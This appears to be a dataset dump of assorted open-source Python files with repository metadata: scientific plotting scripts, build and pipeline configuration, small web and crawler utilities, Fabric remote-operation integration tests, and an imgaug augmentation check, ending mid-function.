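    return conan.create()  # path of the directory ready for qitoolchain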
|
bsd-3-clause
| 4,813,513,214,411,253,000
| 35.520833
| 103
| 0.611238
| false
| 3.682773
| false
| false
| false
|
acapet/GHER-POSTPROC
|
Examples/O2bottomClim.py
|
1
|
1744
|
# We only import the libraries needed for plotting.
# Other libraries are imported in the class definition file, G3D_class.py,
# which contains all process and variables function definition.
import matplotlib
matplotlib.use('pdf')
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import datetime as dt
import numpy.ma as ma
import N3D_class
import G3D_class
# We instantiate an object of the class G3D, just by giving the path to the netcdf file to work with
# Up to now I'm working with 4D netcdf files containing several variables.
# Outputs from different files can be merged easily, as can be seen in other examples
for mm in range(1,13):
Ni = N3D_class.N3D('BS_1d_20100101_20171231_ptrc_T_2010'+format(mm,'02')+'-2010'+format(mm,'02')+'.nc','local_NEMO_004.yml')
Ni.testvar('O2bottom')
NmaskDS= (Ni.bat<120 ) & ~(Ni.bat.mask) # Mask should be True where masked
Ni.apO2=Ni.avgprofileSIGMA(varname='DOX',maskin=NmaskDS)
if mm==1:
N=Ni
else:
N.dates = ma.append(N.dates , Ni.dates,0)
N.time = ma.append(N.time , Ni.time,0)
N.O2bottom = ma.append(N.O2bottom, Ni.O2bottom,0)
N.apO2 = ma.append(N.apO2 , Ni.apO2,0)
del Ni
N.makeclim('O2bottom')
N.mapMonthlyClim('O2bottom',figsuffix='SHELF',cmapname='oxy', subdomain="NWS", Clim=[0,300])
N.mapMonthlyClim('O2bottom',figsuffix='WHOLE',cmapname='oxy', Clim=[0,30])
N.mapMonthlyClim('O2bottom',figsuffix='WHOLEb',cmapname='oxy', Clim=[0,3])
N.plotprofile('apO2',z=-N.z[0,:,0,0],cmapname='oxy',Clim=[0,300])
N.plotprofile('apO2',z=-N.z[0,:,0,0],cmapname='oxy',zlim=[-200,0])
N.plotprofile('apO2',z=-N.z[0,:,0,0],cmapname='oxy',Clim=[0,3],zlim=[-2200,-1000],figout='apO2b')
|
gpl-3.0
| -861,104,597,107,073,700
| 38.636364
| 129
| 0.682913
| false
| 2.678955
| false
| false
| false
|
bloomreach/briefly
|
src/briefly/defaults.py
|
1
|
5344
|
#
# Copyright 2013-2015 BloomReach, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import getpass
from properties import *
# Bare minimum system settings for any pipeline
PIPELINE_DEFAULT_PROPERTIES = Properties(
# System-wide default values.
build_dir = "build",
num_retry = 3,
retry_delay = 10,
username = getpass.getuser(),
log = "${build_dir}/execute.log",
run_threads = 2, # Execution threads
debug = False, # Extra debug information
test_run = False, # Dry-run for check execution flow
# Default values for shell process.
shell = Properties(
max_process = 4,
runner = "/bin/sh",
),
# Default values for java process.
java = Properties(
max_process = 2,
classpath = ["."], # full list of classpath
runner = "java", # full path to java executable.
),
# Default values for hadoop process (local or remote).
hadoop = Properties(
runner = "emr",
jar = None, # s3://<BUCKET>/path/hadoop_jobs.jar
root = "${build_dir}",
bin = "hadoop", # Full path to hadoop binary to execute (local mode only)
),
# Default values for EMR cluster.
emr = Properties(
max_cluster = 2,
cluster_name = "${username}-cluster",
step_name = "${node_hash}",
project_name = None, # Team name or project name to track costs
tags = None, # EC2 tags for the EMR cluster
keyname = None,
instance_groups = [[1, "MASTER", "m1.small"]], # List of instance groups [num, MASTER/CORE, type]
bootstrap_actions = [], # List of bootstrap actions: [[name1, action1, args...], [name2, action2, args...], ...]
# Regular EC2 instance prices. See http://www.ec2instances.info/.
prices = {"t2.micro": 0.01,
"t1.micro": 0.02,
"t2.small": 0.02,
"m1.small": 0.04,
"t2.medium": 0.05,
"m3.medium": 0.07,
"m1.medium": 0.08,
"c3.large": 0.10,
"c1.medium": 0.13,
"m3.large": 0.14,
"m1.large": 0.17,
"r3.large": 0.17,
"c3.xlarge": 0.21,
"m2.xlarge": 0.24,
"m3.xlarge": 0.28,
"m1.xlarge": 0.35,
"r3.xlarge": 0.35,
"c3.2xlarge": 0.42,
"m2.2xlarge": 0.49,
"c1.xlarge": 0.52,
"m3.2xlarge": 0.56,
"g2.2xlarge": 0.65,
"r3.2xlarge": 0.70,
"c3.4xlarge": 0.84,
"i2.xlarge": 0.85,
"m2.4xlarge": 0.98,
"r3.4xlarge": 1.40,
"c3.8xlarge": 1.68,
"i2.2xlarge": 1.70,
"cc2.8xlarge": 2.00,
"cg1.4xlarge": 2.10,
"r3.8xlarge": 2.80,
"hi1.4xlarge": 3.10,
"i2.4xlarge": 3.41,
"cr1.8xlarge": 3.50,
"hs1.8xlarge": 4.60,
"i2.8xlarge": 6.82,},
# Price multiplier for each level. 0 means on-demand instances.
price_upgrade_rate = [0.8, 1.5, 0],
log_uri = None, # S3 location for mapreduce logs e.g. "s3://<BUCKET>/${username}/mr-logs"
ami_version = "2.4.2",
step_timeout = 12 * 60 * 60, # 12 HR (in sec)
),
# Default values for Qubole cluster.
qubole = Properties(
api_url = "https://api2.qubole.com/api",
api_version = "latest",
api_token = None,
aws_region = "us-east-1",
aws_availability_zone = None,
persistent_security_groups = "ElasticMapReduce-slave",
max_cluster = 1,
max_job_per_cluster = 1,
termination_timeout = 5 * 60, # Wait 5 min for cluster termination (in sec).
project_name = None,
hadoop_custom_config = {}, # Custom hadoop configs. Example: {"mapred.output.compress": "true", "mapred.output.compression.type": "BLOCK"}
hadoop_settings = {"master_instance_type": "m1.small", "slave_instance_type": "m1.small", "initial_nodes": 1, "max_nodes": 1}, # Num/type config for the cluster
bootstrap_actions = [], # List of bootstrap actions: [[name1, action1, args...], [name2, action2, args...], ...]
price_upgrade_rate = [0.8, 1.5, 0], # Price multiplier for each level. 0 means on-demand instances.
timeout_for_request = 15, # Timeout for spot instance requests (in min).
log_uri = None, # S3 location for mapreduce logs e.g. "s3://<BUCKET>/${username}/mr-logs"
step_timeout = 43200, # 43200 = 12 * 60 * 60 = 12 HR (in sec).
cluster_id = None, # Default None. If a value is passed, the job is executed on that cluster, and the cluster is not terminated
step_name = "${node_hash}", # If a value is passed, it will be displayed on the qubole analyzer and will help in debugging
),
# Default values for EC2/boto commands.
ec2 = Properties(
key = "S3_ACCESS_KEY",
secret = "S3_SECRET_KEY",
),
)
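# A minimal sketch of how a pipeline might override these defaults
# (property names mirror the structure above; the values are illustrative):
EXAMPLE_OVERRIDES = Properties(
    build_dir = "build-test",
    run_threads = 4,
    emr = Properties(cluster_name = "${username}-test-cluster"),
)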
|
apache-2.0
| -2,506,245,100,201,422,000
| 36.900709
| 164
| 0.580838
| false
| 3.308978
| false
| false
| false
|
pescobar/easybuild-easyblocks
|
easybuild/easyblocks/s/stata.py
|
1
|
3192
|
##
# Copyright 2009-2019 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# https://github.com/easybuilders/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for building and installing Stata, implemented as an easyblock
author: Kenneth Hoste (HPC-UGent)
"""
import os
import re
from easybuild.easyblocks.generic.packedbinary import PackedBinary
from easybuild.tools.build_log import EasyBuildError, print_msg
from easybuild.tools.filetools import change_dir
from easybuild.tools.run import run_cmd, run_cmd_qa
class EB_Stata(PackedBinary):
"""Support for building/installing Stata."""
def install_step(self):
"""Custom install procedure for Stata."""
change_dir(self.installdir)
cmd = os.path.join(self.cfg['start_dir'], 'install')
        std_qa = {
            r"Do you wish to continue\?\s*\(y/n or q to quit\)": 'y',
            r"Are you sure you want to install into .*\?\s*\(y/n or q\)": 'y',
            r"Okay to proceed\s*\(y/n or q to quit\)": 'y',
        }
no_qa = [
"About to proceed with installation:",
"uncompressing files",
"extracting files",
"setting permissions",
]
run_cmd_qa(cmd, {}, no_qa=no_qa, std_qa=std_qa, log_all=True, simple=True)
print_msg("Note: you need to manually run ./stinit in %s to initialise the license for Stata!" % self.installdir)
def sanity_check_step(self):
"""Custom sanity check for Stata."""
custom_paths = {
'files': ['stata', 'xstata'],
'dirs': [],
}
super(EB_Stata, self).sanity_check_step(custom_paths=custom_paths)
# make sure required libpng library is there for Stata
# Stata depends on a very old version of libpng, so we need to provide it
out, _ = run_cmd("ldd %s" % os.path.join(self.installdir, 'stata'), simple=False)
regex = re.compile('libpng.*not found', re.M)
if regex.search(out):
raise EasyBuildError("Required libpng library for 'stata' is not available")
def make_module_req_guess(self):
"""Add top install directory to $PATH for Stata"""
guesses = super(EB_Stata, self).make_module_req_guess()
guesses['PATH'] = ['']
return guesses
|
gpl-2.0
| 55,361,995,667,855,550
| 37.926829
| 121
| 0.656955
| false
| 3.519294
| false
| false
| false
|
emguy/Movie-Trailer
|
media.py
|
1
|
3386
|
# -*- coding: utf-8 -*-
#
# NOTE: This program is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation; either
# version 3, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# Bugs can be reported to Yu Zhang <emguy2000@gmail.com>.
#
# File Name : media.py
# Last Modified : Mon, Feb 01, 2016 3:29:14 PM
import json
import urllib
class Movie():
"""
A Movie object which stores the meta-information about a movie.
All movie data is retrieved from the Open Movie Database (OMDB).
Attributes:
title (str): title of the movie
year (str): the year of production
genre (str): the genre of the movie
plot (str): the plot of the movie
director (str): the name of the movie director
        actors (str): the main actors of the movie
poster_image_url (str): the URL to the movie thumbnail
trailer_youtube_url( str): the URL to the movie trailer (on youtube)
"""
    # We retrieve movie data from the Open Movie Database (OMDB).
OMDB_API = "http://www.omdbapi.com/?y=&plot=short&r=json&t="
# constructor
def __init__(self, title, trailer_url):
        # the requesting url (quote the title so spaces are URL-safe)
        url = Movie.OMDB_API + urllib.quote(title)
        # the json response (a plain GET request to the OMDB API)
        response = urllib.urlopen(url)
# parse json obj
obj = json.load(response)
# load the movie data
self.title = obj["Title"]
self.year = obj["Year"]
self.genre = obj["Genre"]
self.plot = obj["Plot"]
self.director = obj["Director"]
self.actors = obj["Actors"]
self.poster_image_url = obj["Poster"]
self.trailer_youtube_url = trailer_url
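# A minimal illustrative sketch (the title and URL are placeholder values);
# constructing a Movie performs a live OMDB request, so the example is wrapped
# in a function rather than executed at import time:
def example_movie():
    return Movie("Inception", "https://www.youtube.com/watch?v=example")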
# This list stores an array of created movies objects
movie_list = list()
# add movie #1
title = "Star Trek Beyond"
trailer_url = "https://www.youtube.com/watch?v=XRVD32rnzOw"
movie_list.append(Movie(title, trailer_url))
# add movie #2
title = "10 Cloverfield Lane"
trailer_url = "https://www.youtube.com/watch?v=yQy-ANhnUpE"
movie_list.append(Movie(title, trailer_url))
# add movie #3
title = "The Big Short"
trailer_url = "https://www.youtube.com/watch?v=dxAcIWDi8ps"
movie_list.append(Movie(title, trailer_url))
# add movie #4
title = "Zoolander 2"
trailer_url = "https://www.youtube.com/watch?v=4CL4LNWHegk"
movie_list.append(Movie(title, trailer_url))
# add movie #5
title = "ANOMALISA"
trailer_url = "https://www.youtube.com/watch?v=WQkHA3fHk_0"
movie_list.append(Movie(title, trailer_url))
# add movie #6
title = "Daddy's Home"
trailer_url = "https://www.youtube.com/watch?v=Ngptwcz3-JA"
movie_list.append(Movie(title, trailer_url))
# add movie #7
title = "The Little Prince"
trailer_url = "https://www.youtube.com/watch?v=ihi491RQo5A"
movie_list.append(Movie(title, trailer_url))
# add movie #8
title = "13 Hours: The Secret Soldiers of Benghazi"
trailer_url = "https://www.youtube.com/watch?v=4CJBuUwd0Os"
movie_list.append(Movie(title, trailer_url))
# add movie #9
title = "Barnyard"
trailer_url = "https://www.youtube.com/watch?v=s5soJDEbzIc"
movie_list.append(Movie(title, trailer_url))
|
gpl-3.0
| -1,718,229,491,148,597,800
| 31.247619
| 73
| 0.680154
| false
| 3.120737
| false
| false
| false
|
Karajlug/karajlug
|
viewhelper/models.py
|
1
|
2334
|
# coding: utf-8
# -----------------------------------------------------------------------------
# Karajlug.org
# Copyright (C) 2010-2013 Karajlug community
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
# -----------------------------------------------------------------------------
from calverter import Calverter
from django.conf import settings
import urllib
DAYS_NAMES = ("شنبه", "یکشنبه", "دوشنبه", "سه شنبه",
"چهارشنبه", "پنج شنبه", "جمعه")
PERSIAN_DIGITS = {"1": "۱", "2": "۲", "3": "۳", "4": "۴", "5": "۵",
"6": "۶", "7": "۷", "8": "۸", "9": "۹", "0": "۰"}
MONTHS_NAMES = ("فروردین", "اردیبهشت", "خرداد", "تیر", "مرداد",
"شهریور", "مهر", "آبان", "آذر", "دی", "بهمن",
"اسفند")
def format_date(date, lang):
if lang == "fa":
cal = Calverter()
jd = cal.gregorian_to_jd(date.year, date.month,
date.day)
wday = cal.jwday(jd)
jalali = cal.jd_to_jalali(jd)
result = "%s، %d %s %d" % (DAYS_NAMES[wday], jalali[2],
MONTHS_NAMES[jalali[1] - 1], jalali[0])
return to_persian_digits(result)
return date
def to_persian_digits(datestr):
for i in PERSIAN_DIGITS:
datestr = datestr.replace(i, PERSIAN_DIGITS[i])
return datestr
def quote(url):
return urllib.quote_plus("%s" % url)
def full_path(absolute_url):
site = getattr(settings, "URL", "www.karajlug.org")
return "http://%s%s" % (site, absolute_url)
|
gpl-2.0
| 1,601,960,923,630,854,100
| 32.757576
| 79
| 0.557252
| false
| 3.063274
| false
| false
| false
|
kaguna/Yummy-Recipes
|
classes/categories.py
|
1
|
5660
|
# This file handles the class for the categories and the
# CRUD methods associated with the categories.
import re
from classes.recipes import Recipes
class Categories(object):
"""This class will handle all the functions related to the categories and recipes"""
categories = []
def __init__(self, category_name=None, recipe_name=None):
"""constructor to initialize the global variables"""
self.category_name = category_name
self.recipe_name = recipe_name
self.newRecipe = Recipes()
def create_category(self, category_name, category_owner):
"""This will create new and unique category"""
personal_categories = [owner_list for owner_list in self.categories
if category_owner in owner_list]
        # personal_categories holds the categories associated with the user in
        # session, retrieved with a list comprehension.
similar_category_names = [searched_cat_name for searched_cat_name in personal_categories
if searched_cat_name[0] == category_name]
        # similar_category_names checks whether a category with the same name
        # as the one provided by the user already exists.
regexcategory_name = "[a-zA-Z0-9- .]"
if re.match(regexcategory_name, category_name):
if category_name != '' and category_name != ' ' and category_name.strip():
if self.categories != []:
if similar_category_names == []:
                        # If no such name exists, registration takes place.
self.categories.append([category_name, category_owner, ])
return "check_category_creation_success"
return "check_category_name_existence"
self.categories.append([category_name, category_owner, ])
return "check_category_creation_success"
return "check_null_empty_field"
return "check_invalid_category_name"
def view_category(self, category_owner):
"""
This will display the categories for the user in session
"""
personal_categories = [owner_list for owner_list in self.categories
if category_owner in owner_list]
        # personal_categories holds the categories belonging to the logged-in
        # owner, retrieved with a list comprehension.
return personal_categories
def edit_category(self, current_name, new_name, category_owner):
"""This method will aid in updating the category name"""
personal_categories = [owner_list_of_categories for owner_list_of_categories in self.categories
if category_owner in owner_list_of_categories]
similar_category_name = [searched_cat_name for searched_cat_name in personal_categories
if searched_cat_name[0] == new_name]
regexcategory_name = "[a-zA-Z0-9- .]"
if re.match(regexcategory_name, new_name):
if new_name != '' and new_name.strip():
for categoryList in personal_categories:
if current_name in categoryList:
if similar_category_name == []:
category_name_index = personal_categories.index(categoryList)
personal_categories[category_name_index][0] = new_name
                            # Update the category name in the recipes list, but
                            # only for this owner's recipes in the renamed category.
                            for recipeList in self.newRecipe.recipes:
                                if recipeList[1] == current_name and recipeList[2] == category_owner:
                                    recipeList[1] = new_name
                            return "success_on_edit"
return "check_category_name_existence"
return "check_null_empty_field"
return "check_invalid_category_name"
def delete_category(self, category_name, category_owner):
"""
This will help in deleting the categories from user in session by providing the
category name and the and the owner of the category.
"""
personal_categories = [owner_list for owner_list in self.categories
if category_owner in owner_list]
        # Remove all of this owner's recipes that belong to the deleted category.
        self.newRecipe.recipes = [recipeList for recipeList in self.newRecipe.recipes
                                  if not (recipeList[1] == category_name and
                                          recipeList[2] == category_owner)]
        for categoryList in personal_categories:
            if category_name in categoryList:
                # Remove the matching list object itself, so the index into
                # self.categories cannot drift from the owner's filtered view.
                self.categories.remove(categoryList)
                personal_categories.remove(categoryList)
                break
        return personal_categories
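# A short illustrative sketch of the CRUD flow above (the names are examples;
# note that 'categories' is a class attribute shared across instances):
def _example_category_flow():
    cats = Categories()
    cats.create_category("Breakfast", "jane")
    cats.edit_category("Breakfast", "Brunch", "jane")
    return cats.view_category("jane")  # -> [["Brunch", "jane"]]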
|
mit
| 8,747,304,260,757,726,000
| 51.906542
| 103
| 0.59682
| false
| 4.921739
| false
| false
| false
|
petrushev/mkopen
|
mkopen/crawlers/dksk.py
|
1
|
4021
|
# -*- coding: utf-8 -*-
#---------- Државна комисија за спречување корупција ----------
import requests as rq
from StringIO import StringIO
import csv
from datetime import datetime
from time import sleep
from random import random
import locale
from lxml.html import fromstring
from mkopen.db.models import Data, Version, catalog2uuid, data2uuid
from mkopen.utils import setlocale
TODAY = datetime.utcnow().date()
CATALOG_PREFIX = u"Државна комисија за спречување корупција"
BASE = 'http://www.dksk.org.mk/imoti_2'
def main(session):
cur_page = 1
final_page = False
collected_catalogs = []
while not final_page:
start = BASE + '/index.php?search=%d' % cur_page
print 'page:', cur_page
sleep(random() * 0.5 + 0.5)
content = rq.get(start).content
doc = fromstring(content)
# get links to detail pages
detail_a = doc.cssselect("a[href^=detail\.php]")
for link in detail_a:
url = BASE + '/' + link.attrib['href']
catalog, content = crawl_details(url)
if catalog is not None and content is not None:
collected_catalogs.append(','.join(reversed(catalog)))
catalog = (CATALOG_PREFIX, ) + catalog
metadata = {'url': url,
'page_url': start,
'file_type': 'csv'}
save(session, catalog, content, metadata)
# check if final page
next_ = doc.cssselect("img[src='img/forward.png']")
final_page = (len(next_) == 0)
cur_page = cur_page + 1
with setlocale():
collected_catalogs.sort(cmp=locale.strcoll)
# save active pages
catalog = (CATALOG_PREFIX, u'Анкетни листови', u'Активни')
content = ('\n'.join(collected_catalogs)).encode('utf-8')
metadata = {'file_type': 'csv'}
save(session, catalog, content, metadata)
def crawl_details(url):
sleep(random() * 0.5 + 0.5)
content = rq.get(url).content
doc = fromstring(content)
tables = doc.cssselect('table.class')
if len(tables) < 2:
# no details
return None, None
definer_table, details_table = tables[0], tables[1]
tr = definer_table.cssselect('tr')[1]
definer = [td.text_content().strip() for td in tr.cssselect('td')]
definer = (definer[2], definer[3], definer[0] + ' ' + definer[1])
csv_handle = StringIO()
writer = csv.writer(csv_handle)
for tr in details_table.cssselect('tr'):
line = [td.text_content().strip().encode('utf-8')
for td in tr.cssselect('td')]
writer.writerow(line)
csv_content = csv_handle.getvalue()
csv_handle.close()
# resort data
csv_content = csv_content.split('\n')
csv_header = csv_content.pop(0)
csv_content.sort()
csv_content.insert(0, csv_header)
csv_content = '\n'.join(csv_content)
return definer, csv_content
def save(session, catalog_id, data, metadata):
# locate entry
data_id = catalog2uuid(catalog_id)
entry = Data.load(session, id=data_id)
if entry is None:
entry = Data(id=data_id, catalog_id=catalog_id, last_checked=TODAY)
session.add(entry)
elif entry.last_checked == TODAY:
# data is crawled and recently checked
        print 'skip:', entry
return
# check for changes
data_hash = data2uuid(data)
entry_version = Version.load(session, id=data_hash)
if entry_version is None:
# data is changed
metadata = dict(metadata)
metadata['file_type'] = 'csv'
entry_version = Version(id=data_hash, data=data, updated=TODAY, metadata=metadata)
entry_version.ref = entry
elif entry_version.ref.id != entry.id:
        print 'data mismatch:', entry_version.ref.id, entry.id
# update entry for last check
entry.last_checked = TODAY
session.commit()
return entry_version
|
gpl-3.0
| -767,376,997,350,376,600
| 27.258993
| 90
| 0.60947
| false
| 3.360137
| false
| false
| false
|
WielderOfMjoelnir/pypeira
|
main.py
|
1
|
1118
|
import pypeira.pypeira as pype
if __name__ == "__main__":
# Create instance of IRA (not necessary but much more convenient for now)
ira = pype.IRA()
path = "./data"
# Read files. The read() function will walk from the given dir and find all files satisfying
# the given criteria. Set 'walk' to False if this is not wanted.
data = ira.read(path, dtype='bcd', walk=True)
# Uncomment plot_brightest(data) below, and comment out EVERYTHING after this line for the easiest way.
# ira.plot_brightest(data)
    # get_brightest() returns an (index, maximum_value) pair
idx, max_val = ira.get_brightest(data)
# pixel_data() then collects all the values of that specific pixel, for all the HDUs in the "data" list.
xs, ys = ira.pixel_data(idx, data)
# Finally one simply plots using Matplotlib
# NOTE: Hot pixels have not been removed at this stage, so some use of plt.ylim() is highly recommended.
import matplotlib.pyplot as plt
plt.plot(xs, ys)
plt.ylabel('Flux (MJy/sr)')
plt.title('Flux vs. Time')
plt.xlabel('Time (BJD)')
plt.show()
|
mit
| -8,322,726,822,375,709,000
| 35.064516
| 108
| 0.668157
| false
| 3.398176
| false
| false
| false
|
xLegoz/fabric
|
integration/test_operations.py
|
1
|
6882
|
from six import StringIO
import os
import posixpath
import shutil
from fabric.api import (
run, path, put, sudo, abort, warn_only, env, cd, local, settings, get
)
from fabric.contrib.files import exists
from utils import Integration
def assert_mode(path, mode):
remote_mode = run("stat -c \"%%a\" \"%s\"" % path).stdout
assert remote_mode == mode, "remote %r != expected %r" % (remote_mode, mode)
class TestOperations(Integration):
filepath = "/tmp/whocares"
dirpath = "/tmp/whatever/bin"
not_owned = "/tmp/notmine"
def setup(self):
super(TestOperations, self).setup()
run("mkdir -p %s" % " ".join([self.dirpath, self.not_owned]))
def teardown(self):
super(TestOperations, self).teardown()
# Revert any chown crap from put sudo tests
sudo("chown %s ." % env.user)
# Nuke to prevent bleed
sudo("rm -rf %s" % " ".join([self.dirpath, self.filepath]))
sudo("rm -rf %s" % self.not_owned)
def test_no_trailing_space_in_shell_path_in_run(self):
put(StringIO("#!/bin/bash\necho hi"), "%s/myapp" % self.dirpath, mode="0755")
with path(self.dirpath):
assert run('myapp').stdout == 'hi'
def test_string_put_mode_arg_doesnt_error(self):
put(StringIO("#!/bin/bash\necho hi"), self.filepath, mode="0755")
assert_mode(self.filepath, "755")
def test_int_put_mode_works_ok_too(self):
put(StringIO("#!/bin/bash\necho hi"), self.filepath, mode=0o755)
assert_mode(self.filepath, "755")
def _chown(self, target):
sudo("chown root %s" % target)
def _put_via_sudo(self, source=None, target_suffix='myfile', **kwargs):
# Ensure target dir prefix is not owned by our user (so we fail unless
# the sudo part of things is working)
self._chown(self.not_owned)
source = source if source else StringIO("whatever")
# Drop temp file into that dir, via use_sudo, + any kwargs
return put(
source,
self.not_owned + '/' + target_suffix,
use_sudo=True,
**kwargs
)
def test_put_with_use_sudo(self):
self._put_via_sudo()
def test_put_with_dir_and_use_sudo(self):
# Test cwd should be root of fabric source tree. Use our own folder as
# the source, meh.
self._put_via_sudo(source='integration', target_suffix='')
def test_put_with_use_sudo_and_custom_temp_dir(self):
# TODO: allow dependency injection in sftp.put or w/e, test it in
# isolation instead.
# For now, just half-ass it by ensuring $HOME isn't writable
# temporarily.
self._chown('.')
self._put_via_sudo(temp_dir='/tmp')
def test_put_with_use_sudo_dir_and_custom_temp_dir(self):
self._chown('.')
self._put_via_sudo(source='integration', target_suffix='', temp_dir='/tmp')
def test_put_use_sudo_and_explicit_mode(self):
# Setup
target_dir = posixpath.join(self.filepath, 'blah')
subdir = "inner"
subdir_abs = posixpath.join(target_dir, subdir)
filename = "whatever.txt"
target_file = posixpath.join(subdir_abs, filename)
run("mkdir -p %s" % subdir_abs)
self._chown(subdir_abs)
local_path = os.path.join('/tmp', filename)
with open(local_path, 'w+') as fd:
fd.write('stuff\n')
# Upload + assert
with cd(target_dir):
put(local_path, subdir, use_sudo=True, mode='777')
assert_mode(target_file, '777')
def test_put_file_to_dir_with_use_sudo_and_mirror_mode(self):
# Ensure mode of local file, umask varies on eg travis vs various
# localhosts
source = 'whatever.txt'
try:
local("touch %s" % source)
local("chmod 644 %s" % source)
# Target for _put_via_sudo is a directory by default
uploaded = self._put_via_sudo(
source=source, mirror_local_mode=True
)
assert_mode(uploaded[0], '644')
finally:
local("rm -f %s" % source)
def test_put_directory_use_sudo_and_spaces(self):
localdir = 'I have spaces'
localfile = os.path.join(localdir, 'file.txt')
os.mkdir(localdir)
with open(localfile, 'w') as fd:
fd.write('stuff\n')
try:
uploaded = self._put_via_sudo(localdir, target_suffix='')
# Kinda dumb, put() would've died if it couldn't do it, but.
assert exists(uploaded[0])
assert exists(posixpath.dirname(uploaded[0]))
finally:
shutil.rmtree(localdir)
def test_agent_forwarding_functions(self):
# When paramiko #399 is present this will hang indefinitely
with settings(forward_agent=True):
run('ssh-add -L')
def test_get_with_use_sudo_unowned_file(self):
# Ensure target is not normally readable by us
target = self.filepath
sudo("echo 'nope' > %s" % target)
sudo("chown root:root %s" % target)
sudo("chmod 0440 %s" % target)
# Pull down with use_sudo, confirm contents
local_ = StringIO()
result = get(
local_path=local_,
remote_path=target,
use_sudo=True,
)
assert local_.getvalue() == "nope\n"
def test_get_with_use_sudo_groupowned_file(self):
# Issue #1226: file gotten w/ use_sudo, file normally readable via
# group perms (yes - so use_sudo not required - full use case involves
# full-directory get() where use_sudo *is* required). Prior to fix,
# temp file is chmod 404 which seems to cause perm denied due to group
# membership (despite 'other' readability).
target = self.filepath
sudo("echo 'nope' > %s" % target)
# Same group as connected user
gid = run("id -g")
sudo("chown root:%s %s" % (gid, target))
# Same perms as bug use case (only really need group read)
sudo("chmod 0640 %s" % target)
# Do eet
local_ = StringIO()
result = get(
local_path=local_,
remote_path=target,
use_sudo=True,
)
assert local_.getvalue() == "nope\n"
def test_get_from_unreadable_dir(self):
# Put file in dir as normal user
remotepath = "%s/myfile.txt" % self.dirpath
run("echo 'foo' > %s" % remotepath)
# Make dir unreadable (but still executable - impossible to obtain
# file if dir is both unreadable and unexecutable)
sudo("chown root:root %s" % self.dirpath)
sudo("chmod 711 %s" % self.dirpath)
# Try gettin' it
local_ = StringIO()
get(local_path=local_, remote_path=remotepath)
assert local_.getvalue() == 'foo\n'
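# A hedged sketch of the core pattern these tests exercise, outside the test
# harness. Assumes a configured env.host_string; the remote paths are
# placeholders, not paths used by the suite.
def put_and_get_via_sudo():
    from six import StringIO
    from fabric.api import get, put
    # put() with use_sudo uploads to a temp location, then sudo-moves the
    # file into the root-owned target directory.
    put(StringIO("secret"), "/etc/myapp/conf", use_sudo=True, mode="0640")
    # get() with use_sudo sudo-copies an unreadable file to a readable
    # temp location before downloading it.
    buf = StringIO()
    get(remote_path="/etc/myapp/conf", local_path=buf, use_sudo=True)
    assert buf.getvalue() == "secret"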
|
bsd-2-clause
| -6,177,240,608,647,160,000
| 36
| 85
| 0.586022
| false
| 3.637421
| true
| false
| false
|
nektor211/imgaug
|
tests/check_background_augmentation.py
|
1
|
3270
|
from __future__ import print_function, division
import imgaug as ia
from imgaug import augmenters as iaa
from scipy import misc
import numpy as np
from skimage import data
def main():
augseq = iaa.Sequential([
iaa.Fliplr(0.5),
iaa.CoarseDropout(p=0.1, size_percent=0.1)
])
print("------------------")
print("augseq.augment_batches(batches, background=True)")
print("------------------")
batches = list(load_images())
batches_aug = augseq.augment_batches(batches, background=True)
images_aug = []
keypoints_aug = []
for batch_aug in batches_aug:
images_aug.append(batch_aug.images_aug)
keypoints_aug.append(batch_aug.keypoints_aug)
misc.imshow(draw_grid(images_aug, keypoints_aug))
print("------------------")
print("augseq.augment_batches(batches, background=True) -> only images")
print("------------------")
batches = list(load_images())
batches = [batch.images for batch in batches]
batches_aug = augseq.augment_batches(batches, background=True)
images_aug = []
keypoints_aug = None
for batch_aug in batches_aug:
images_aug.append(batch_aug)
misc.imshow(draw_grid(images_aug, keypoints_aug))
print("------------------")
print("BackgroundAugmenter")
print("------------------")
batch_loader = ia.BatchLoader(load_images)
bg_augmenter = ia.BackgroundAugmenter(batch_loader, augseq)
images_aug = []
keypoints_aug = []
while True:
print("Next batch...")
batch = bg_augmenter.get_batch()
if batch is None:
print("Finished.")
break
images_aug.append(batch.images_aug)
keypoints_aug.append(batch.keypoints_aug)
misc.imshow(draw_grid(images_aug, keypoints_aug))
def load_images():
batch_size = 4
astronaut = data.astronaut()
astronaut = ia.imresize_single_image(astronaut, (64, 64))
kps = ia.KeypointsOnImage([ia.Keypoint(x=15, y=25)], shape=astronaut.shape)
counter = 0
for i in range(10):
batch_images = []
batch_kps = []
for b in range(batch_size):
